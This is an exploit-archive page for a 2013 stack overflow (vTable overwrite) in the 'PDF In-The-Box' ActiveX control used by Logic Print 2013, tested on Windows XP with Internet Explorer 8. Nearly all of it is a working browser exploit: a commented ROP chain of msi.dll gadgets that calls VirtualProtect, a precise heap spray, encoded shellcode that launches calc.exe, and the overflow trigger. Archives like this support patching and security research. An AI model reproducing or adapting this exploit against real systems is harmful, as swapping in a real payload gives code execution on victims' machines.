Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Logic Print 2013 stack overflow (vTable overwrite) - exploit.company
header-logo
Suggest Exploit
vendor:
Logic Print 2013
by:
Hicham Oumounid
7.5
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Logic Print 2013
Affected Version From: Logic Print 2013
Affected Version To: Logic Print 2013 (Older versions)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 French + Internet Explorer 8
2013

Logic Print 2013 stack overflow (vTable overwrite)

The vulnerability exists in the third-party DLL "PDF In-The-Box" used by Logic Print 2013. The ROP (Return-Oriented Programming) is performed using the os DLL "msi.dll" version 3.1.4001.5512.

Mitigation:

Update to the latest version of the "PDF In-The-Box" DLL and the os DLL "msi.dll".
Source

Exploit-DB raw data:

<!-- 
Exploit Title: Logic Print 2013 stack overflow (vTable overwrite)
Software Link: http://www.logic-print.com/
Tested on: Win XP SP3 French + Internet Explorer 8
Date: 29/05/2013
Author: h1ch4m (Hicham Oumounid)
Email: h1ch4m@live.fr
Twitter: @o_h1ch4m

Thanks to corelanc0d3r for: "DEPS" - Precise heap spray for FF/IE8/IE9/IE10

Well, the bug isn't in the app itself, but in a third party dll "PDF In-The-Box" from http://www.synactis.com
Logic Print 2013 uses an old version of the dll, new ones aren't affected,
the ROP is from an os dll: [msi.dll] (C:\WINDOWS\system32\msi.dll) 3.1.4001.5512

 -->
<html>
<head>
<OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="xploit"></OBJECT>
</head>
<body OnLoad="xploit();">
<div id="blah"></div>
<script language="javascript">
    var rop = "";
	var shellcode = "";
	var junk1 = '';
	var junk2 = '';
	
	
    function theMagicalMysteryTour()
	{
	    rop = unescape("%u2230%u2030" +
		               /////////////////////////////////////////////
					   ///              STACK PIVOT              ///
					   /////////////////////////////////////////////
		               "%u370d%u7d20" +  // 0x7d20370d : # XCHG EAX,ESP # ADD DWORD PTR DS:[EAX],EAX # MOV EAX,EDI # POP EDI # POP ESI # POP EBP # RETN 0x04    ** [msi.dll] **   |  ascii
					   "%u4141%u4141" +
					   "%u0116%u7d2e" +  // 0x7d2e0116 :  # RETN    ** [msi.dll] **   |  ascii
					   "%u4141%u4141" +
					   
					   /////////////////////////////////////////////
					   /// ECX = lpOldProtect (ptr to W address) ///
					   /////////////////////////////////////////////
					   "%u1815%u7d21" +  // 0x7d211815 :  # POP ECX # RETN [msi.dll] 
					   "%u4070%u7D3B" +  // 0x7D3B4070 :  # &Writable location [msi.dll]
					   /////////////////////////////////////////////
					   ///          EDX = NewProtect (0x40)      ///
					   /////////////////////////////////////////////
					   "%u9c86%u7d27" +  // 0x7d279c86 :  # POP EAX # RETN    ** [msi.dll]
					   "%uFFC0%uFFFF" +  // 0xFFFFFFBF
					   "%u66d7%u7d2e" +  // 0x7d2e66d7 :  # NEG EAX # RETN 0x04    ** [msi.dll]
					   "%u23dc%u7d20" +  // 0x7d2023dc :  # XCHG EAX,EDX # RETN    ** [msi.dll]
					   "%u4141%u4141" +
					   /////////////////////////////////////////////
					   ///               EBX = dwSize            ///
					   /////////////////////////////////////////////
					   "%u9c86%u7d27" +  // 0x7d279c86 :  # POP EAX # RETN    ** [msi.dll]
					   "%uFAFF%uFFFF" +  // 0xFFFFFAFF
					   "%u66d7%u7d2e" +  // 0x7d2e66d7 :  # NEG EAX # RETN 0x04    ** [msi.dll]
					   "%u29ac%u7d24" +  // 0x7d2429ac :  # XCHG EAX,EBX # OR EAX,14C48300 # POP EBP # RETN 0x08    ** [msi.dll]
					   "%u4141%u4141" +
					   "%u4141%u4141" +
					   "%u0116%u7d2e" +  // 0x7d2e0116 :  # RETN    ** [msi.dll] **   |  ascii
					   "%u4141%u4141" +
					   "%u4141%u4141" +
					   /////////////////////////////////////////////
					   ///     ESI = ptr to VirtualProtect()     ///
					   ///     EBP = ReturnTo (ptr to jmp esp)   ///
					   /////////////////////////////////////////////
					   "%u9c86%u7d27" +  // 0x7d279c86 :  # POP EAX # RETN    ** [msi.dll]
					   "%u1318%u6358" +  // 0x63581318 :  # ptr to VirtualProtect() [mshtml.dll]
					   "%uf84a%u7d3a" +  // 0x7d3af84a :  # MOV EAX,DWORD PTR DS:[EAX] # RETN    ** [msi.dll]
					   "%u0622%u7d36" +  // 0x7d360622 :  # PUSH EAX # POP ESI # POP EBP # RETN 0x04    ** [msi.dll]
					   "%ub275%u7d24" +  // 0x7d24b275 :  # jmp esp
					   /////////////////////////////////////////////
					   ///         EDI = ROP NOP (RETN)          ///
					   /////////////////////////////////////////////
					   "%u2669%u7d20" +  // 0x7d202669 :  # POP EDI # RETN    ** [msi.dll]
					   "%u4141%u4141" +
					   "%u0116%u7d2e" +  // 0x7d2e0116 :  # RETN    ** [msi.dll] **   |  ascii
					   /////////////////////////////////////////////
					   ///       EAX = NOP (0x90909090)          ///
					   /////////////////////////////////////////////
					   "%u9c86%u7d27" +  // 0x7d279c86 :  # POP EAX # RETN    ** [msi.dll]
					   "%u9090%u9090" +
					   /////////////////////////////////////////////
					   ///           PUSH IT & GET IT            ///
					   /////////////////////////////////////////////
					   "%uc08e%u7d27" +  // 0x7d27c08e :  # PUSHAD # RETN    ** [msi.dll]
					   "");
		
		// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378
		shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");
	}
	
    function DEPS()
    {
	    var div_container = document.getElementById("blah");
	    div_container.style.cssText = "display:none";
	    var data;
	    offset = 0x104;
	    junk = unescape("%u2020%u2020");
	    while (junk.length < 0x1000) junk += junk;
	    
	    data = junk.substring(0,offset) + rop + shellcode
	    data += junk.substring(0,0x800-offset-rop.length-shellcode.length);

	    while (data.length < 0x80000) data += data;
	
	    for (var i = 0; i < 0x450; i++) 
	    {
			var obj = document.createElement("button");
		    obj.title = data.substring(0,0x40000-0x58);
		    div_container.appendChild(obj);
	    }
	}
	
	function xploit()
	{
	    theMagicalMysteryTour();
		DEPS();
		
		// MOV EAX,DWORD PTR SS:[EBP-10];    the stack is overflowed, ebp-10 is put in eax then >>>>||
		// MOV ECX,DWORD PTR DS:[EAX];                                                              ||
		// CALL DWORD PTR DS:[ECX-4];         BOOOOOOOOOOOM                                     <<<<||
	    
		EAX = "\x28\x22\x30\x20";  // 0x20302228  heap adress " Corelan "DEPS" - Precise heap spray "
		
		while (junk1.length < 189) junk1 += "\x41";
		while (junk2.length < 7000) junk2 += "\x41";
		
		var xploit = document.getElementById("xploit");
		xploit.ConnectToSynactis(junk1+EAX+junk2);
	}
	
</script>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR